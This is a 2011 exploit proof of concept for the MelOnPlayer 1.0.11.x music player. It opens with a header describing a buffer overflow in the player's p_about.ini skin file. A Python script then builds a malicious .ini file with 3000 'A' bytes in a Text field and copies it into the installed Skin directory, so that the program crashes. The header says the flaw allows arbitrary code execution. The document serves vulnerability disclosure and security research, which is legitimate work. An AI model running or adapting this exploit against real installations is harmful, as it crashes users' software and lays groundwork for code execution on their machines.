|
# Exploit Title: MelOnPlayer 1.0.11.x Denial of Service POC # Date: 09/09/2011 # Author: modpr0be # Software Link: http://www.melon.co.id/cs/guide/download/player.do # Vulnerable version: 1.0.11.x # Tested on: Windows XP SP3 (VirtualBox 4.1.0 r73009) # CVE : N/A # Thanks: offsec, exploit-db, corelan-team, 5M7X, loneferret, mr_me, _sinner
#### Software description: # Melon Player is a famous software in Indonesia to play songs that are provided by # the Melon portal (http://www.melon.co.id). This software can play any music # file types such as mp3, wav, wma, mp4, and others. This player can also play # the files on your local computer or by online streaming to the portal Melon. # The songs can also be downloaded to your local computer. # #### Vulnerable information: # The main program (IDMelonPlayer.exe) suffers from a buffer overflow vulnerability # when opening p_about.ini file (Note: Actually, p_about.ini is a configuration file # as part of skin template. This file will bring the program information and can be # accessed on the menu (Menu → Information)), as a result of adding extra bytes to # parts of the file (Text section), giving the attackers possibility to run an arbitrary # code execution on the system that install Melon Player. # ### Some Conditions: # This is just the POC, it will just crash the program. # and it's unicode ;) # ##
#!/usr/bin/python
import os,sys,shutil,time
header=("""[MAIN] MainStyle=SKIN Resize=NO Mask=YES BGStyle=IMAGE DefSize=0,0,427,136 Image=skin.bmp Button=2 Slider= Static=1 Text=4 Edit= Combo=
[MAINBG] TopLeft=145,389,6,21 TopCenter=153,389,11,21 TopRight=166,389,6,21 MiddleLeft=145,412,6,21 MiddleCenter=153,412,11,21 MiddleRight=166,412,6,21 BottomLeft=145,435,6,34 BottomCenter=153,435,11,34 BottomRight=166,435,6,34
[MAINMASK] TopLeft=174,389,10,10 TopCenter=185,389,10,10 TopRight=196,389,10,10 MiddleLeft=185,389,10,10 MiddleCenter=185,389,10,10 MiddleRight=185,389,10,10 BottomLeft=174,400,10,10 BottomCenter=185,389,10,10 BottomRight=196,400,10,10
[BUTTON_1] Name=?? ID=1001 ResizeStyle=TOP_LEFT Tooltip= CheckBox=FALSE Position=410,4,13,13 NormalRect=223,389,13,13 OverRect=238,389,13,13 DownRect=253,389,13,13 DisabledRect=223,389,13,13 MaskRect=2000,0,13,13
[BUTTON_2] Name=?? ID=1002 ResizeStyle=TOP_LEFT Tooltip= CheckBox=FALSE Position=173,105,80,20 NormalRect=0,763,80,20 OverRect=0,763,80,20 DownRect=81,763,80,20 DisabledRect=162,763,80,20 MaskRect=2000,0,80,20
[STATIC_1] Name=???_?? ID=2001 Position=20,31,72,84 TopLeft=14,478,72,84 TopCenter= TopRight= MiddleLeft= MiddleCenter= MiddleRight= BottomLeft= BottomCenter= BottomRight=
[TEXT_1] Name=popup Name sdw ID=3701 Position=2,2,420,14 Text=MelOn Player Font=Arial FontSize=12 FontBold= Align=CENTER FontColor=0,0,0 """)
footer=(""" [TEXT_3] Name=???? ID=3703 Position=104,50,243,14 Text=Melon Player Version 1.0.0.101102 Font=Arial FontSize=12 FontBold= Align= FontColor=0,0,0
[TEXT_4] Name=Copyright ID=3704 Position=104,72,303,14 Text=Copyright PT. Melon Indonesia. All Right Reserved. Font=Arial FontSize=12 FontBold= Align= FontColor=0,0,0 """)
filename="p_about.ini" splash=os.path.abspath(filename) skindir="C:\Program Files\MelonPlayerID\Skin"
junk = "A" * 3000
buggy=(""" [TEXT_2] Name=popup Name ID=3702 Position=3,3,420,14 Text="""+junk+ """ Font=Arial FontSize=12 FontBold= Align=CENTER FontColor=170,170,170\r\n""")
banner=(""" [*] MelOnPlayer 1.0.11.x Denial of Service POC [*] modpr0be[at]spentera[dot]com. [*] thanks a lot: cyb3r.anbu | otoy :) ===================================================== """)
file=open(filename,'w') if os.name == 'nt': if os.path.isdir(skindir): try: file.write(header+buggy+footer) print banner print "[*] Creating the malicious .ini file.." time.sleep(2) print "[*] Malicious file (POC)",filename,"created.." print "[*] Path:",splash file.close() shutil.copy2(splash,skindir) print "[*] File",filename,"has been copied to",skindir except IOError: print "[-] Could not write to destination folder, check permission.." sys.exit() else: print "[-] Could not find Skin directory, is MelOn Player installed?" sys.exit() else: print "[-] Please run this script on Windows." sys.exit()
|